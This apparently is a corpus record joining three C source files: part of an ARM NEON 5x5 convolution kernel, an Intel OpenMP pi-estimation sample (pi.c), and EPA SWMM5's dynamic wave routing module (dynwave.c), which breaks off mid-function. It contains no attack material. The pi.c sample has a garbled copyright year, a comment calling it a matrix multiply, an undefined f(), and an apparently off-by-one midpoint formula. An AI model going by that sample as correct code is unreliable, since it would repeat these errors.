float32x4_t _r43 = vld1q_f32(r4+12);
float32x4_t _r44 = vld1q_f32(r4+16);
float32x4_t _r45 = vld1q_f32(r4+20);
float32x4_t _r46 = vld1q_f32(r4+24);
float32x4_t _r47 = vld1q_f32(r4+28);
float32x4_t _r48 = vld1q_f32(r4+32);
float32x4_t _r49 = vld1q_f32(r4+36);
float32x4_t _r410 = vld1q_f32(r4+40);
float32x4_t _k40 = vld1q_f32(k0);
float32x4_t _k41 = vld1q_f32(k0+4);
float32x4_t _k42 = vld1q_f32(k0+8);
float32x4_t _k43 = vld1q_f32(k0+12);
float32x4_t _k44 = vld1q_f32(k0+16);
k0 -= 80;
_sum0 = vmlaq_f32(_sum0, _k40, _r40);
_sum0 = vmlaq_f32(_sum0, _k41, _r41);
_sum0 = vmlaq_f32(_sum0, _k42, _r42);
_sum0 = vmlaq_f32(_sum0, _k43, _r43);
_sum0 = vmlaq_f32(_sum0, _k44, _r44);
_sum1 = vmlaq_f32(_sum1, _k40, _r42);
_sum1 = vmlaq_f32(_sum1, _k41, _r43);
_sum1 = vmlaq_f32(_sum1, _k42, _r44);
_sum1 = vmlaq_f32(_sum1, _k43, _r45);
_sum1 = vmlaq_f32(_sum1, _k44, _r46);
_sum2 = vmlaq_f32(_sum2, _k40, _r44);
_sum2 = vmlaq_f32(_sum2, _k41, _r45);
_sum2 = vmlaq_f32(_sum2, _k42, _r46);
_sum2 = vmlaq_f32(_sum2, _k43, _r47);
_sum2 = vmlaq_f32(_sum2, _k44, _r48);
_sum3 = vmlaq_f32(_sum3, _k40, _r46);
_sum3 = vmlaq_f32(_sum3, _k41, _r47);
_sum3 = vmlaq_f32(_sum3, _k42, _r48);
_sum3 = vmlaq_f32(_sum3, _k43, _r49);
_sum3 = vmlaq_f32(_sum3, _k44, _r410);
vst1q_f32(outptr0, _sum0);
vst1q_f32(outptr0+4, _sum1);
vst1q_f32(outptr0+8, _sum2);
vst1q_f32(outptr0+12, _sum3);
r0 += 8*4;
r1 += 8*4;
r2 += 8*4;
r3 += 8*4;
r4 += 8*4;
outptr0 += 16;
}
for (; j+1 < outw; j+=2)
{
float32x4_t _sum0 = _bias0;
float32x4_t _sum1 = _bias0;
float32x4_t _r00 = vld1q_f32(r0);
float32x4_t _r01 = vld1q_f32(r0+4);
float32x4_t _r02 = vld1q_f32(r0+8);
float32x4_t _r03 = vld1q_f32(r0+12);
float32x4_t _r04 = vld1q_f32(r0+16);
float32x4_t _r05 = vld1q_f32(r0+20);
float32x4_t _r06 = vld1q_f32(r0+24);
float32x4_t _k00 = vld1q_f32(k0);
float32x4_t _k01 = vld1q_f32(k0+4);
float32x4_t _k02 = vld1q_f32(k0+8);
float32x4_t _k03 = vld1q_f32(k0+12);
float32x4_t _k04 = vld1q_f32(k0+16);
k0 += 20;
_sum0 = vmlaq_f32(_sum0, _k00, _r00);
_sum0 = vmlaq_f32(_sum0, _k01, _r01);
_sum0 = vmlaq_f32(_sum0, _k02, _r02);
_sum0 = vmlaq_f32(_sum0, _k03, _r03);
_sum0 = vmlaq_f32(_sum0, _k04, _r04);
_sum1 = vmlaq_f32(_sum1, _k00, _r02);
_sum1 = vmlaq_f32(_sum1, _k01, _r03);
_sum1 = vmlaq_f32(_sum1, _k02, _r04);
_sum1 = vmlaq_f32(_sum1, _k03, _r05);
_sum1 = vmlaq_f32(_sum1, _k04, _r06);
float32x4_t _r10 = vld1q_f32(r1);
float32x4_t _r11 = vld1q_f32(r1+4);
float32x4_t _r12 = vld1q_f32(r1+8);
float32x4_t _r13 = vld1q_f32(r1+12);
float32x4_t _r14 = vld1q_f32(r1+16);
float32x4_t _r15 = vld1q_f32(r1+20);
float32x4_t _r16 = vld1q_f32(r1+24);
float32x4_t _k10 = vld1q_f32(k0);
float32x4_t _k11 = vld1q_f32(k0+4);
float32x4_t _k12 = vld1q_f32(k0+8);
float32x4_t _k13 = vld1q_f32(k0+12);
float32x4_t _k14 = vld1q_f32(k0+16);
k0 += 20;
_sum0 = vmlaq_f32(_sum0, _k10, _r10);
_sum0 = vmlaq_f32(_sum0, _k11, _r11);
_sum0 = vmlaq_f32(_sum0, _k12, _r12);
_sum0 = vmlaq_f32(_sum0, _k13, _r13);
_sum0 = vmlaq_f32(_sum0, _k14, _r14);
_sum1 = vmlaq_f32(_sum1, _k10, _r12);
_sum1 = vmlaq_f32(_sum1, _k11, _r13);
_sum1 = vmlaq_f32(_sum1, _k12, _r14);
_sum1 = vmlaq_f32(_sum1, _k13, _r15);
_sum1 = vmlaq_f32(_sum1, _k14, _r16);
float32x4_t _r20 = vld1q_f32(r2);
float32x4_t _r21 = vld1q_f32(r2+4);
float32x4_t _r22 = vld1q_f32(r2+8);
float32x4_t _r23 = vld1q_f32(r2+12);
float32x4_t _r24 = vld1q_f32(r2+16);
float32x4_t _r25 = vld1q_f32(r2+20);
float32x4_t _r26 = vld1q_f32(r2+24);
float32x4_t _k20 = vld1q_f32(k0);
float32x4_t _k21 = vld1q_f32(k0+4);
float32x4_t _k22 = vld1q_f32(k0+8);
float32x4_t _k23 = vld1q_f32(k0+12);
float32x4_t _k24 = vld1q_f32(k0+16);
k0 += 20;
_sum0 = vmlaq_f32(_sum0, _k20, _r20);
_sum0 = vmlaq_f32(_sum0, _k21, _r21);
_sum0 = vmlaq_f32(_sum0, _k22, _r22);
_sum0 = vmlaq_f32(_sum0, _k23, _r23);
_sum0 = vmlaq_f32(_sum0, _k24, _r24);
_sum1 = vmlaq_f32(_sum1, _k20, _r22);
_sum1 = vmlaq_f32(_sum1, _k21, _r23);
_sum1 = vmlaq_f32(_sum1, _k22, _r24);
_sum1 = vmlaq_f32(_sum1, _k23, _r25);
_sum1 = vmlaq_f32(_sum1, _k24, _r26);
float32x4_t _r30 = vld1q_f32(r3);
float32x4_t _r31 = vld1q_f32(r3+4);
float32x4_t _r32 = vld1q_f32(r3+8);
float32x4_t _r33 = vld1q_f32(r3+12);
float32x4_t _r34 = vld1q_f32(r3+16);
float32x4_t _r35 = vld1q_f32(r3+20);
float32x4_t _r36 = vld1q_f32(r3+24);
float32x4_t _k30 = vld1q_f32(k0);
float32x4_t _k31 = vld1q_f32(k0+4);
float32x4_t _k32 = vld1q_f32(k0+8);
float32x4_t _k33 = vld1q_f32(k0+12);
float32x4_t _k34 = vld1q_f32(k0+16);
k0 += 20;
_sum0 = vmlaq_f32(_sum0, _k30, _r30);
_sum0 = vmlaq_f32(_sum0, _k31, _r31);
_sum0 = vmlaq_f32(_sum0, _k32, _r32);
_sum0 = vmlaq_f32(_sum0, _k33, _r33);
_sum0 = vmlaq_f32(_sum0, _k34, _r34);
_sum1 = vmlaq_f32(_sum1, _k30, _r32);
_sum1 = vmlaq_f32(_sum1, _k31, _r33);
_sum1 = vmlaq_f32(_sum1, _k32, _r34);
_sum1 = vmlaq_f32(_sum1, _k33, _r35);
_sum1 = vmlaq_f32(_sum1, _k34, _r36);
float32x4_t _r40 = vld1q_f32(r4);
float32x4_t _r41 = vld1q_f32(r4+4);
float32x4_t _r42 = vld1q_f32(r4+8);
float32x4_t _r43 = vld1q_f32(r4+12);
float32x4_t _r44 = vld1q_f32(r4+16);
float32x4_t _r45 = vld1q_f32(r4+20);
float32x4_t _r46 = vld1q_f32(r4+24);
float32x4_t _k40 = vld1q_f32(k0);
float32x4_t _k41 = vld1q_f32(k0+4);
float32x4_t _k42 = vld1q_f32(k0+8);
float32x4_t _k43 = vld1q_f32(k0+12);
float32x4_t _k44 = vld1q_f32(k0+16);
k0 -= 80;
_sum0 = vmlaq_f32(_sum0, _k40, _r40);
_sum0 = vmlaq_f32(_sum0, _k41, _r41);
_sum0 = vmlaq_f32(_sum0, _k42, _r42);
_sum0 = vmlaq_f32(_sum0, _k43, _r43);
_sum0 = vmlaq_f32(_sum0, _k44, _r44);
_sum1 = vmlaq_f32(_sum1, _k40, _r42);
_sum1 = vmlaq_f32(_sum1, _k41, _r43);
_sum1 = vmlaq_f32(_sum1, _k42, _r44);
_sum1 = vmlaq_f32(_sum1, _k43, _r45);
_sum1 = vmlaq_f32(_sum1, _k44, _r46);
vst1q_f32(outptr0, _sum0);
vst1q_f32(outptr0+4, _sum1);
r0 += 4*4;
r1 += 4*4;
r2 += 4*4;
r3 += 4*4;
r4 += 4*4;
outptr0 += 8;
}
for (; j < outw; j++)
{
float32x4_t _sum0 = _bias0;
float32x4_t _r00 = vld1q_f32(r0);
float32x4_t _r01 = vld1q_f32(r0+4);
float32x4_t _r02 = vld1q_f32(r0+8);
float32x4_t _r03 = vld1q_f32(r0+12);
float32x4_t _r04 = vld1q_f32(r0+16);
float32x4_t _k00 = vld1q_f32(k0);
float32x4_t _k01 = vld1q_f32(k0+4);
float32x4_t _k02 = vld1q_f32(k0+8);
float32x4_t _k03 = vld1q_f32(k0+12);
float32x4_t _k04 = vld1q_f32(k0+16);
k0 += 20;
_sum0 = vmlaq_f32(_sum0, _k00, _r00);
_sum0 = vmlaq_f32(_sum0, _k01, _r01);
_sum0 = vmlaq_f32(_sum0, _k02, _r02);
_sum0 = vmlaq_f32(_sum0, _k03, _r03);
_sum0 = vmlaq_f32(_sum0, _k04, _r04);
float32x4_t _r10 = vld1q_f32(r1);
float32x4_t _r11 = vld1q_f32(r1+4);
float32x4_t _r12 = vld1q_f32(r1+8);
float32x4_t _r13 = vld1q_f32(r1+12);
float32x4_t _r14 = vld1q_f32(r1+16);
float32x4_t _k10 = vld1q_f32(k0);
float32x4_t _k11 = vld1q_f32(k0+4);
float32x4_t _k12 = vld1q_f32(k0+8);
float32x4_t _k13 = vld1q_f32(k0+12);
float32x4_t _k14 = vld1q_f32(k0+16);
k0 += 20;
_sum0 = vmlaq_f32(_sum0, _k10, _r10);
_sum0 = vmlaq_f32(_sum0, _k11, _r11);
_sum0 = vmlaq_f32(_sum0, _k12, _r12);
_sum0 = vmlaq_f32(_sum0, _k13, _r13);
_sum0 = vmlaq_f32(_sum0, _k14, _r14);
float32x4_t _r20 = vld1q_f32(r2);
float32x4_t _r21 = vld1q_f32(r2+4);
float32x4_t _r22 = vld1q_f32(r2+8);
float32x4_t _r23 = vld1q_f32(r2+12);
float32x4_t _r24 = vld1q_f32(r2+16);
float32x4_t _k20 = vld1q_f32(k0);
float32x4_t _k21 = vld1q_f32(k0+4);
float32x4_t _k22 = vld1q_f32(k0+8);
float32x4_t _k23 = vld1q_f32(k0+12);
float32x4_t _k24 = vld1q_f32(k0+16);
k0 += 20;
_sum0 = vmlaq_f32(_sum0, _k20, _r20);
_sum0 = vmlaq_f32(_sum0, _k21, _r21);
_sum0 = vmlaq_f32(_sum0, _k22, _r22);
_sum0 = vmlaq_f32(_sum0, _k23, _r23);
_sum0 = vmlaq_f32(_sum0, _k24, _r24);
float32x4_t _r30 = vld1q_f32(r3);
float32x4_t _r31 = vld1q_f32(r3+4);
float32x4_t _r32 = vld1q_f32(r3+8);
float32x4_t _r33 = vld1q_f32(r3+12);
float32x4_t _r34 = vld1q_f32(r3+16);
float32x4_t _k30 = vld1q_f32(k0);
float32x4_t _k31 = vld1q_f32(k0+4);
float32x4_t _k32 = vld1q_f32(k0+8);
float32x4_t _k33 = vld1q_f32(k0+12);
float32x4_t _k34 = vld1q_f32(k0+16);
k0 += 20;
_sum0 = vmlaq_f32(_sum0, _k30, _r30);
_sum0 = vmlaq_f32(_sum0, _k31, _r31);
_sum0 = vmlaq_f32(_sum0, _k32, _r32);
_sum0 = vmlaq_f32(_sum0, _k33, _r33);
_sum0 = vmlaq_f32(_sum0, _k34, _r34);
float32x4_t _r40 = vld1q_f32(r4);
float32x4_t _r41 = vld1q_f32(r4+4);
float32x4_t _r42 = vld1q_f32(r4+8);
float32x4_t _r43 = vld1q_f32(r4+12);
float32x4_t _r44 = vld1q_f32(r4+16);
float32x4_t _k40 = vld1q_f32(k0);
float32x4_t _k41 = vld1q_f32(k0+4);
float32x4_t _k42 = vld1q_f32(k0+8);
float32x4_t _k43 = vld1q_f32(k0+12);
float32x4_t _k44 = vld1q_f32(k0+16);
k0 -= 80;
_sum0 = vmlaq_f32(_sum0, _k40, _r40);
_sum0 = vmlaq_f32(_sum0, _k41, _r41);
_sum0 = vmlaq_f32(_sum0, _k42, _r42);
_sum0 = vmlaq_f32(_sum0, _k43, _r43);
_sum0 = vmlaq_f32(_sum0, _k44, _r44);
vst1q_f32(outptr0, _sum0);
r0 += 2*4;
r1 += 2*4;
r2 += 2*4;
r3 += 2*4;
r4 += 2*4;
outptr0 += 4;
}
r0 += tailstep;
r1 += tailstep;
r2 += tailstep;
r3 += tailstep;
r4 += tailstep;
}
}
}
|
pi.c | /*
* Copyright (C) 2j010 - 2015 Intel Corporation. All Rights Reserved.
*
* The source code contained or described herein and all
* documents related to the source code ("Material") are owned by
* Intel Corporation or its suppliers or licensors. Title to the
* Material remains with Intel Corporation or its suppliers and
* licensors. The Material is protected by worldwide copyright
* laws and treaty provisions. No part of the Material may be
* used, copied, reproduced, modified, published, uploaded,
* posted, transmitted, distributed, or disclosed in any way
* except as expressly provided in the license provided with the
* Materials. No license under any patent, copyright, trade
* secret or other intellectual property right is granted to or
* conferred upon you by disclosure or delivery of the Materials,
* either expressly, by implication, inducement, estoppel or
* otherwise, except as expressly provided in the license
* provided with the Materials
*
*/
// Simple minded matrix multiply
#include <stdio.h>
#include <sys/time.h>
#define N 2000000000
double f( double x )
;
double clock_it(void)
{
double duration = 0.0;
struct timeval start;
gettimeofday(&start, NULL);
duration = (double)(start.tv_sec + start.tv_usec/1000000.0);
return duration;
}
main()
{
double sum, pi, x, h;
double start_time, stop_time;
int i;
h = (double)1.0/(double)N;
sum = 0.0;
start_time = clock_it();
#ifdef _OPENMP
#pragma omp parallel for private(x) reduction(+:sum)
#endif
for ( i=0; i<N ; i++ ){
x = h*(i-0.5);
sum = sum + f(x);
}
stop_time = clock_it();
// print value of pi to be sure multiplication is correct
pi = h*sum;
printf(" pi is approximately : %12.9f \n", pi);
// print elapsed time
printf("Elapsed time = %lf seconds\n",(stop_time - start_time));
}
|
dynwave.c | //-----------------------------------------------------------------------------
// dynwave.c
//
// Project: EPA SWMM5
// Version: 5.1
// Date: 03/20/14 (5.1.001)
// 03/28/14 (5.1.002)
// 09/15/14 (5.1.007)
// 03/19/15 (5.1.008)
// 08/01/16 (5.1.011)
// Author: L. Rossman (EPA)
// M. Tryby (EPA)
// R. Dickinson (CDM)
//
// Dynamic wave flow routing functions.
//
// This module solves the dynamic wave flow routing equations using
// Picard Iterations (i.e., a method of successive approximations)
// to solve the explicit form of the continuity and momentum equations
// for conduits.
//
// Build 5.1.002:
// - Only non-ponded nodal surface area is saved for use in
// surcharge algorithm.
//
// Build 5.1.007:
// - Node losses added to node outflow variable instead of treated
// as a separate item when computing change in node flow volume.
//
// Build 5.1.008:
// - Module-specific constants moved here from project.c.
// - Support added for user-specified minimum variable time step.
// - Node crown elevations found here instead of in flowrout.c module.
// - OpenMP use to parallelize findLinkFlows() & findNodeDepths().
// - Bug in finding complete list of capacity limited links fixed.
//
// Build 5.1.011:
// - Added test for failed memory allocation.
// - Fixed illegal array index bug for Ideal Pumps.
//
//-----------------------------------------------------------------------------
#define _CRT_SECURE_NO_DEPRECATE
#include "headers.h"
#include <stdlib.h>
#include <math.h>
#if defined(_OPENMP)
#include <omp.h> //(5.1.008)
#endif
//-----------------------------------------------------------------------------
// Constants
//-----------------------------------------------------------------------------
static const double MINTIMESTEP = 0.001; // min. time step (sec) //(5.1.008)
static const double OMEGA = 0.5; // under-relaxation parameter
// Constants moved here from project.c // //(5.1.008)
const double DEFAULT_SURFAREA = 12.566; // Min. nodal surface area (~4 ft diam.)
const double DEFAULT_HEADTOL = 0.005; // Default head tolerance (ft)
const int DEFAULT_MAXTRIALS = 8; // Max. trials per time step
//-----------------------------------------------------------------------------
// Data Structures
//-----------------------------------------------------------------------------
typedef struct
{
char converged; // TRUE if iterations for a node done
double newSurfArea; // current surface area (ft2)
double oldSurfArea; // previous surface area (ft2)
double sumdqdh; // sum of dqdh from adjoining links
double dYdT; // change in depth w.r.t. time (ft/sec)
} TXnode;
//-----------------------------------------------------------------------------
// Shared Variables
//-----------------------------------------------------------------------------
static double VariableStep; // size of variable time step (sec)
static TXnode* Xnode; // extended nodal information
static double Omega; // actual under-relaxation parameter
static int Steps; // number of Picard iterations
//-----------------------------------------------------------------------------
// Function declarations
//-----------------------------------------------------------------------------
static void initRoutingStep(void);
static void initNodeStates(void);
static void findBypassedLinks();
static void findLimitedLinks();
static void findLinkFlows(double dt);
static int isTrueConduit(int link);
static void findNonConduitFlow(int link, double dt);
static void findNonConduitSurfArea(int link);
static double getModPumpFlow(int link, double q, double dt);
static void updateNodeFlows(int link);
static int findNodeDepths(double dt);
static void setNodeDepth(int node, double dt);
static double getFloodedDepth(int node, int canPond, double dV, double yNew,
double yMax, double dt);
static double getVariableStep(double maxStep);
static double getLinkStep(double tMin, int *minLink);
static double getNodeStep(double tMin, int *minNode);
//=============================================================================
//// This function was modified for release 5.1.008. //// //(5.1.008)
void dynwave_init()
//
// Input: none
// Output: none
// Purpose: initializes dynamic wave routing method.
//
{
int i, j;
double z;
VariableStep = 0.0;
Xnode = (TXnode *) calloc(Nobjects[NODE], sizeof(TXnode));
//// Added to release 5.1.011. //// //(5.1.011)
if ( Xnode == NULL )
{
report_writeErrorMsg(ERR_MEMORY,
" Not enough memory for dynamic wave routing.");
return;
}
//////////////////////////////////////
// --- initialize node surface areas & crown elev.
for (i = 0; i < Nobjects[NODE]; i++ )
{
Xnode[i].newSurfArea = 0.0;
Xnode[i].oldSurfArea = 0.0;
Node[i].crownElev = Node[i].invertElev;
}
// --- update node crown elev. & initialize links
for (i = 0; i < Nobjects[LINK]; i++)
{
j = Link[i].node1;
z = Node[j].invertElev + Link[i].offset1 + Link[i].xsect.yFull;
Node[j].crownElev = MAX(Node[j].crownElev, z);
j = Link[i].node2;
z = Node[j].invertElev + Link[i].offset2 + Link[i].xsect.yFull;
Node[j].crownElev = MAX(Node[j].crownElev, z);
Link[i].flowClass = DRY;
Link[i].dqdh = 0.0;
}
}
//=============================================================================
void dynwave_close()
//
// Input: none
// Output: none
// Purpose: frees memory allocated for dynamic wave routing method.
//
{
FREE(Xnode);
}
//=============================================================================
//// New function added to release 5.1.008. //// //(5.1.008)
void dynwave_validate()
//
// Input: none
// Output: none
// Purpose: adjusts dynamic wave routing options.
//
{
if ( MinRouteStep > RouteStep ) MinRouteStep = RouteStep;
if ( MinRouteStep < MINTIMESTEP ) MinRouteStep = MINTIMESTEP;
if ( MinSurfArea == 0.0 ) MinSurfArea = DEFAULT_SURFAREA;
else MinSurfArea /= UCF(LENGTH) * UCF(LENGTH);
if ( HeadTol == 0.0 ) HeadTol = DEFAULT_HEADTOL;
else HeadTol /= UCF(LENGTH);
if ( MaxTrials == 0 ) MaxTrials = DEFAULT_MAXTRIALS;
}
//=============================================================================
double dynwave_getRoutingStep(double fixedStep)
//
// Input: fixedStep = user-supplied fixed time step (sec)
// Output: returns routing time step (sec)
// Purpose: computes variable routing time step if applicable.
//
{
// --- use user-supplied fixed step if variable step option turned off
// or if its smaller than the min. allowable variable time step
if ( CourantFactor == 0.0 ) return fixedStep;
if ( fixedStep < MINTIMESTEP ) return fixedStep;
// --- at start of simulation (when current variable step is zero)
// use the minimum allowable time step
if ( VariableStep == 0.0 )
{
VariableStep = MinRouteStep; //(5.1.008)
}
// --- otherwise compute variable step based on current flow solution
else VariableStep = getVariableStep(fixedStep);
// --- adjust step to be a multiple of a millisecond
VariableStep = floor(1000.0 * VariableStep) / 1000.0;
return VariableStep;
}
//=============================================================================
int dynwave_execute(double tStep)
//
// Input: links = array of topo sorted links indexes
// tStep = time step (sec)
// Output: returns number of iterations used
// Purpose: routes flows through drainage network over current time step.
//
{
int converged;
// --- initialize
if ( ErrorCode ) return 0;
Steps = 0;
converged = FALSE;
Omega = OMEGA;
initRoutingStep();
// --- keep iterating until convergence
while ( Steps < MaxTrials )
{
// --- execute a routing step & check for nodal convergence
initNodeStates();
findLinkFlows(tStep);
converged = findNodeDepths(tStep);
Steps++;
if ( Steps > 1 )
{
if ( converged ) break;
// --- check if link calculations can be skipped in next step
findBypassedLinks();
}
}
if ( !converged ) NonConvergeCount++;
// --- identify any capacity-limited conduits
findLimitedLinks();
return Steps;
}
//=============================================================================
void initRoutingStep()
{
int i;
for (i = 0; i < Nobjects[NODE]; i++)
{
Xnode[i].converged = FALSE;
Xnode[i].dYdT = 0.0;
}
for (i = 0; i < Nobjects[LINK]; i++)
{
Link[i].bypassed = FALSE;
Link[i].surfArea1 = 0.0;
Link[i].surfArea2 = 0.0;
}
// --- a2 preserves conduit area from solution at last time step
for ( i = 0; i < Nlinks[CONDUIT]; i++) Conduit[i].a2 = Conduit[i].a1;
}
//=============================================================================
void initNodeStates()
//
// Input: none
// Output: none
// Purpose: initializes node's surface area, inflow & outflow
//
{
int i;
for (i = 0; i < Nobjects[NODE]; i++)
{
// --- initialize nodal surface area
if ( AllowPonding )
{
Xnode[i].newSurfArea = node_getPondedArea(i, Node[i].newDepth);
}
else
{
Xnode[i].newSurfArea = node_getSurfArea(i, Node[i].newDepth);
}
if ( Xnode[i].newSurfArea < MinSurfArea )
{
Xnode[i].newSurfArea = MinSurfArea;
}
//// Following code section modified for release 5.1.007 //// //(5.1.007)
// --- initialize nodal inflow & outflow
Node[i].inflow = 0.0;
Node[i].outflow = Node[i].losses;
if ( Node[i].newLatFlow >= 0.0 )
{
Node[i].inflow += Node[i].newLatFlow;
}
else
{
Node[i].outflow -= Node[i].newLatFlow;
}
Xnode[i].sumdqdh = 0.0;
}
}
//=============================================================================
void findBypassedLinks()
{
int i;
for (i = 0; i < Nobjects[LINK]; i++)
{
if ( Xnode[Link[i].node1].converged &&
Xnode[Link[i].node2].converged )
Link[i].bypassed = TRUE;
else Link[i].bypassed = FALSE;
}
}
//=============================================================================
void findLimitedLinks()
//
// Input: none
// Output: none
// Purpose: determines if a conduit link is capacity limited.
//
{
int j, n1, n2, k;
double h1, h2;
for (j = 0; j < Nobjects[LINK]; j++)
{
// ---- check only non-dummy conduit links
if ( !isTrueConduit(j) ) continue; //(5.1.008)
// --- check that upstream end is full
k = Link[j].subIndex;
Conduit[k].capacityLimited = FALSE;
if ( Conduit[k].a1 >= Link[j].xsect.aFull )
{
// --- check if HGL slope > conduit slope
n1 = Link[j].node1;
n2 = Link[j].node2;
h1 = Node[n1].newDepth + Node[n1].invertElev;
h2 = Node[n2].newDepth + Node[n2].invertElev;
if ( (h1 - h2) > fabs(Conduit[k].slope) * Conduit[k].length )
Conduit[k].capacityLimited = TRUE;
}
}
}
//=============================================================================
void findLinkFlows(double dt)
{
int i;
// --- find new flow in each non-dummy conduit
#pragma omp parallel num_threads(NumThreads) //(5.1.008)
{
#pragma omp for //(5.1.008)
for ( i = 0; i < Nobjects[LINK]; i++)
{
if ( isTrueConduit(i) && !Link[i].bypassed )
dwflow_findConduitFlow(i, Steps, Omega, dt);
}
}
// --- update inflow/outflows for nodes attached to non-dummy conduits
for ( i = 0; i < Nobjects[LINK]; i++)
{
if ( isTrueConduit(i) ) updateNodeFlows(i);
}
// --- find new flows for all dummy conduits, pumps & regulators
for ( i = 0; i < Nobjects[LINK]; i++)
{
if ( !isTrueConduit(i) )
{
if ( !Link[i].bypassed ) findNonConduitFlow(i, dt);
updateNodeFlows(i);
}
}
}
//=============================================================================
int isTrueConduit(int j)
{
return ( Link[j].type == CONDUIT && Link[j].xsect.type != DUMMY );
}
//=============================================================================
void findNonConduitFlow(int i, double dt)
//
// Input: i = link index
// dt = time step (sec)
// Output: none
// Purpose: finds new flow in a non-conduit-type link
//
{
double qLast; // previous link flow (cfs)
double qNew; // new link flow (cfs)
// --- get link flow from last iteration
qLast = Link[i].newFlow;
Link[i].dqdh = 0.0;
// --- get new inflow to link from its upstream node
// (link_getInflow returns 0 if flap gate closed or pump is offline)
qNew = link_getInflow(i);
if ( Link[i].type == PUMP ) qNew = getModPumpFlow(i, qNew, dt);
// --- find surface area at each end of link
findNonConduitSurfArea(i);
// --- apply under-relaxation with flow from previous iteration;
// --- do not allow flow to change direction without first being 0
if ( Steps > 0 && Link[i].type != PUMP )
{
qNew = (1.0 - Omega) * qLast + Omega * qNew;
if ( qNew * qLast < 0.0 ) qNew = 0.001 * SGN(qNew);
}
Link[i].newFlow = qNew;
}
//=============================================================================
double getModPumpFlow(int i, double q, double dt)
//
// Input: i = link index
// q = pump flow from pump curve (cfs)
// dt = time step (sec)
// Output: returns modified pump flow rate (cfs)
// Purpose: modifies pump curve pumping rate depending on amount of water
// available at pump's inlet node.
//
{
int j = Link[i].node1; // pump's inlet node index
int k = Link[i].subIndex; // pump's index
double newNetInflow; // inflow - outflow rate (cfs)
double netFlowVolume; // inflow - outflow volume (ft3)
double y; // node depth (ft)
if ( q == 0.0 ) return q;
// --- case where inlet node is a storage node:
// prevent node volume from going negative
if ( Node[j].type == STORAGE ) return node_getMaxOutflow(j, q, dt);
// --- case where inlet is a non-storage node
switch ( Pump[k].type )
{
// --- for Type1 pump, a volume is computed for inlet node,
// so make sure it doesn't go negative
case TYPE1_PUMP:
return node_getMaxOutflow(j, q, dt);
// --- for other types of pumps, if pumping rate would make depth
// at upstream node negative, then set pumping rate = inflow
case TYPE2_PUMP:
case TYPE4_PUMP:
case TYPE3_PUMP:
newNetInflow = Node[j].inflow - Node[j].outflow - q;
netFlowVolume = 0.5 * (Node[j].oldNetInflow + newNetInflow ) * dt;
y = Node[j].oldDepth + netFlowVolume / Xnode[j].newSurfArea;
if ( y <= 0.0 ) return Node[j].inflow;
}
return q;
}
//=============================================================================
void findNonConduitSurfArea(int i)
//
// Input: i = link index
// Output: none
// Purpose: finds the surface area contributed by a non-conduit
// link to its upstream and downstream nodes.
//
{
if ( Link[i].type == ORIFICE )
{
Link[i].surfArea1 = Orifice[Link[i].subIndex].surfArea / 2.;
}
// --- no surface area for weirs to maintain SWMM 4 compatibility
/*
else if ( Link[i].type == WEIR )
{
Xlink[i].surfArea1 = Weir[Link[i].subIndex].surfArea / 2.;
}
*/
else Link[i].surfArea1 = 0.0;
Link[i].surfArea2 = Link[i].surfArea1;
if ( Link[i].flowClass == UP_CRITICAL ||
Node[Link[i].node1].type == STORAGE ) Link[i].surfArea1 = 0.0;
if ( Link[i].flowClass == DN_CRITICAL ||
Node[Link[i].node2].type == STORAGE ) Link[i].surfArea2 = 0.0;
}
//=============================================================================
void updateNodeFlows(int i)
//
// Input: i = link index
// q = link flow rate (cfs)
// Output: none
// Purpose: updates cumulative inflow & outflow at link's end nodes.
//
{
int k; //(5.1.011)
int barrels = 1;
int n1 = Link[i].node1;
int n2 = Link[i].node2;
double q = Link[i].newFlow;
double uniformLossRate = 0.0;
// --- compute any uniform seepage loss from a conduit
if ( Link[i].type == CONDUIT )
{
k = Link[i].subIndex;
uniformLossRate = Conduit[k].evapLossRate + Conduit[k].seepLossRate;
barrels = Conduit[k].barrels;
}
// --- update total inflow & outflow at upstream/downstream nodes
if ( q >= 0.0 )
{
Node[n1].outflow += q + uniformLossRate;
Node[n2].inflow += q;
}
else
{
Node[n1].inflow -= q;
Node[n2].outflow -= q - uniformLossRate;
}
// --- add surf. area contributions to upstream/downstream nodes
Xnode[Link[i].node1].newSurfArea += Link[i].surfArea1 * barrels;
Xnode[Link[i].node2].newSurfArea += Link[i].surfArea2 * barrels;
// --- update summed value of dqdh at each end node
Xnode[Link[i].node1].sumdqdh += Link[i].dqdh;
if ( Link[i].type == PUMP )
{
k = Link[i].subIndex;
if ( Pump[k].type != TYPE4_PUMP ) //(5.1.011)
{
Xnode[n2].sumdqdh += Link[i].dqdh;
}
}
else Xnode[n2].sumdqdh += Link[i].dqdh;
}
//=============================================================================
int findNodeDepths(double dt)
{
int i;
int converged; // convergence flag
double yOld; // previous node depth (ft)
// --- compute outfall depths based on flow in connecting link
for ( i = 0; i < Nobjects[LINK]; i++ ) link_setOutfallDepth(i);
// --- compute new depth for all non-outfall nodes and determine if
// depth change from previous iteration is below tolerance
converged = TRUE;
#pragma omp parallel num_threads(NumThreads) //(5.1.008)
{
#pragma omp for private(yOld) //(5.1.008)
for ( i = 0; i < Nobjects[NODE]; i++ )
{
if ( Node[i].type == OUTFALL ) continue;
yOld = Node[i].newDepth;
setNodeDepth(i, dt);
Xnode[i].converged = TRUE;
if ( fabs(yOld - Node[i].newDepth) > HeadTol )
{
converged = FALSE;
Xnode[i].converged = FALSE;
}
}
} //(5.1.008)
return converged;
}
//=============================================================================
void setNodeDepth(int i, double dt)
//
// Input: i = node index
// dt = time step (sec)
// Output: none
// Purpose: sets depth at non-outfall node after current time step.
//
{
int canPond; // TRUE if node can pond overflows
int isPonded; // TRUE if node is currently ponded
double dQ; // inflow minus outflow at node (cfs)
double dV; // change in node volume (ft3)
double dy; // change in node depth (ft)
double yMax; // max. depth at node (ft)
double yOld; // node depth at previous time step (ft)
double yLast; // previous node depth (ft)
double yNew; // new node depth (ft)
double yCrown; // depth to node crown (ft)
double surfArea; // node surface area (ft2)
double denom; // denominator term
double corr; // correction factor
double f; // relative surcharge depth
// --- see if node can pond water above it
canPond = (AllowPonding && Node[i].pondedArea > 0.0);
isPonded = (canPond && Node[i].newDepth > Node[i].fullDepth);
// --- initialize values
yCrown = Node[i].crownElev - Node[i].invertElev;
yOld = Node[i].oldDepth;
yLast = Node[i].newDepth;
Node[i].overflow = 0.0;
surfArea = Xnode[i].newSurfArea;
// --- determine average net flow volume into node over the time step
dQ = Node[i].inflow - Node[i].outflow;
dV = 0.5 * (Node[i].oldNetInflow + dQ) * dt;
// --- if node not surcharged, base depth change on surface area
if ( yLast <= yCrown || Node[i].type == STORAGE || isPonded )
{
dy = dV / surfArea;
